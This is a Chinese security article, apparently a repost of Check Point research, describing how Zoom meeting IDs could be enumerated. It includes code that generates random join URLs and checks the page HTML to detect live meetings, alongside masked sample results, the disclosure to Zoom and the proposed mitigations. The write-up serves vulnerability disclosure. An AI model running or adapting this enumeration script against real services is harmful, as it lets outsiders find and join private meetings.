ang010ela 嘶吼专业版
本文分析一个ZOOM安全漏洞,以及如何利用该漏洞来识别和加入活动会议。文中的漏洞详情已经报告给了Zoom Video Communications公司,Zoom也给出了一些缓解措施。
使用Zoom的用户可能知道Zoom Meeting ID是由于9或10或11个数字组成的。如果没有启用“Require meeting password”选项或Waiting Room,这个9/10/11位的数字就唯一可以确保会议安全防止非认证用户接入的。
首先,研究人员预生成了一个可能有效的Zoom Meeting ID列表。从中随机选取1000个Meeting ID,并准备用URL字符串加入会议:
urls = []
for _ in range(1000):
urls.append("https://zoom.us/j/{}".format(randint(100000000, 9999999999)))
但是如何确定一个Zoom Meeting ID表示的是有效的会议呢?研究人员发现了一个快速、简易的方式来检查,就是根据在访问“Join Meeting” URL (https://zoom.us/j/{MEETING_ID}) 返回的响应的HTML Body的div元素来进行检查:
然后研究人员尝试将以上方法自动化:
for url in urls:
yield MakeHTTPRequest(url=url, callback=parseResponse)
def MakeHTTPRequest(url, callback)
…
def parseResponse(response):
if response.css('div#join-errormsg').get() is None:
print('Valid Meeting ID found: {}'.format(response.url))
else:
print('Invalid Meeting ID'
运行的结果如下所示:
Invalid Meeting ID
Valid Meeting ID found: https://zoom.us/j/22XXX41X8
Valid Meeting ID found: https://zoom.us/j/8XXX34XXX9
Valid Meeting ID found: https://zoom.us/j/93XXX9XXX5
Bingo!
研究人员在随机生成的Meeting ID中预测了大约4%的Meeting ID,与暴力破解相比,成功率还是非常高的。
研究人员在2019年7月22日联系了Zoom,并提出了以下缓解措施:
1. 重新实现Meeting ID生成算法
2. 用强加密的随机化函数替换现有随机函数
3. 增加Meeting ID的数字或符号的数量
4. 强制主机使用口令、PIN、SSO等进行认证。
本文参考自:https://research.checkpoint.com/2020/zoom-zoom-we-are-watching-you/
京公网安备 11010802041100号